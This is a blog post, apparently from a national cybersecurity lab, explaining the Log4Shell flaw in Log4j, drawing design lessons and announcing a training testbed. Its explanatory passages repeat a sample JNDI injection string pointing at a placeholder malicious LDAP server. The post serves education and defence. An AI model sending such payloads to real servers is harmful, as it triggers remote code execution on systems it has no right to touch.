Log4Shell testbed released

Log4Shell (CVE-2021-44228) is a serious zero-day security vulnerability in a widely used Java logging library Log4j, disclosed to public on 9 Dec 2021.  It allows a remote attacker to execute arbitrary java program in a victim server with vulnerable Log4j library, by simply sending a carefully crafted string (e.g. “${jndi:ldap://malicious_ldap_server/malicious_java_program}”) to the victim server. The attacker may trigger this security vulnerability and launch a remote attack by simply changing its web browser user-agent value to such string, or just renaming its iOS device to such string. The damage of this security vulnerability is huge, due to multiple reasons, including  

  • the Java logging library Log4j is widely used in servers, 
  • this security bug appears as early as 2013 and has existed for a long time without being discovered by public, 
  • the attacker can easily and remotely execute any malicious program in a victim server. 

The root cause of this security vulnerability can be attributed to abusing designed features (i.e. remote code execution) of Log4j. If a dummy logging software rather than the powerful Log4j was used by the victim server, then the consequence would be: a wired string (e.g. “${jndi:ldap://malicious_ldap_server/malicious_java_program}”) is written to a text file literally[1].  However, by design, Log4j allows to download Java program from a remote server and execute it locally, to make the logging library more powerful and flexible. And such remote code execution feature is enabled by default.  Meanwhile, software engineers who invoke Log4j library, may not realize that a powerful but dangerous remote code execution feature of the logging library is enabled already.   

We could learn some lessons from this incident: 

  • When designing software API, the security related features (like remote code execution) should not be hidden from a caller of the software library, and should have a proper default value: e.g. by default, remote code execution should be turned off, and encryption protection should be turned on; 
  • Proper firewall rules should be enforced for any expected remote code execution feature, e.g. whitelist of trusted and permitted servers that host remote codes;  
  • The software downloaded from remote servers should be certified (ie. digitally signed) by trusted party in advanced, and verified and authenticated locally before execution; 
  • User input should be validated and filtered properly: E.g. why software engineers accept wired strings (e.g. “${jndi:ldap://malicious_ldap_server/malicious_java_program}”) as an iOS device name or a web browser user-agent, which is expected to be the concatenation of the name of a web browser (e.g. Chrome, Firefox, IE/Edge, Safari, Opera, etc) and some optional meta-information.  Such design flaws make Log4Shell bug much easier to be triggered remotely.  

Many people, especially cyber security related researchers, students, and employees, may be interested to have some hands-on experience with such serious security vulnerabilities like Log4Shell, for research, education, or training purposesNow NCL is providing a testbed to allow customers to repeat this Log4Shell attack by playing the role of attackers, or watch the attack step-by-step in a live environment.  A video tutorial is available in YouTube https://www.youtube.com/watch?v=jG-WExKidcM . If interested, please contact our email support@ncl.sg with subject “Log4Shell”. 

In the future, NCL may continue to provide such testbeds for upcoming serious security vulnerability more quickly and efficiently using NCL’s new research output.   

  

 

 

 
 

[1] Of course, if this text file will be post-processed by Log4j later, which may really occur in some companies, Log4Shell might be still triggered. 

Comments

Post a Comment

Popular posts from this blog

GreyHats CTF 2023

Image
The GreyHats CTF 2023 event, jointly organized by the National Cybersecurity R&D Lab (NCL) and NUS Greyhats , took place from July 15th to 16th, 2023, at the School of Computing, National University of Singapore. The event witnessed the participation of 90 finalists who formed 15 teams , including 5 international teams and 10 local teams . These 90 finalists had previously competed in the GreyHats qualifier rounds and successfully qualified for the NUS GreyHats CTF 2023 event. The qualifier rounds attracted participation from more than 1600 individuals representing 454 teams (314 international teams & 140 local teams) . Greyhats is the largest student-led information security interest group based in NUS. The members of Greyhats are enthusiastic students with strong technical skills, keen to spread the love of cyber-exercises. NCL is a research lab established in 2015, funded by National Research Foundation, under the National Cybersecurity R&D (NCR) Programme. It
Read more

The Youth Cyber Exploration Programme (YCEP) - Central Capture-the-Flag 2023

Image
The Youth Cyber Exploration Programme (YCEP) Central Capture-the-Flag 2023 competition took place on the 25th of July 2023, in conjunction with WorldSkills ASEASN 2023, at Suntec Convention Centre witnessed close to 70 finalists from different schools. Photo by Cyber Security Agency of Singapore The competition was organized by CSA, with the support of National Cybersecurity R&D Lab (NCL) and Cisco Systems, aimed to ignite the passion for cybersecurity among young talents and foster a vibrant cyber community. We would like to extend our heartfelt appreciation to all students who showcased their incredible skills and determination throughout the competition. Congratulations to all the individual winners, as well as the top three group winners, Team 06, Team 13, and Team 10. Photo by Cyber Security Agency of Singapore We were honoured to have Mr. Tan Kiat How, Senior Minister of State for Communications and Information and Senior Minister of State for National Development,
Read more

Critical Infrastructure Defence Exercise (CIDeX) 2023

Image
National Cybersecurity R&D Lab (NCL) had the opportunity to support Critical Infrastructure Defence Exercise (CIDeX) 2023 from 22nd November to 24th November 2023 held at the School of Computing, National University Singapore (NUS). The event involves over 200 participants coming from DIS, CSA and 24 other national agencies across six Critical Information Infrastructure (CII) Sectors. Mr. Heng Chee How, the Senior Minister of State for Defence, and Dr. Janil Puthucheary, the Senior Minister of State for Communications and Information and Health, attended the Critical Infrastructure Defence Exercise (CIDeX) 2023 on 24th of November 2023. The event focuses on training and strengthening Whole-Of-Government (WoG) cyber capabilities to detect and tackle cyber security threats to Information Technology (IT) and OT networks that control the operations of critical infrastructure. NCL would like to express gratitude to MINDEF and Cybersecurity Agency of Singapore (CSA) for prov
Read more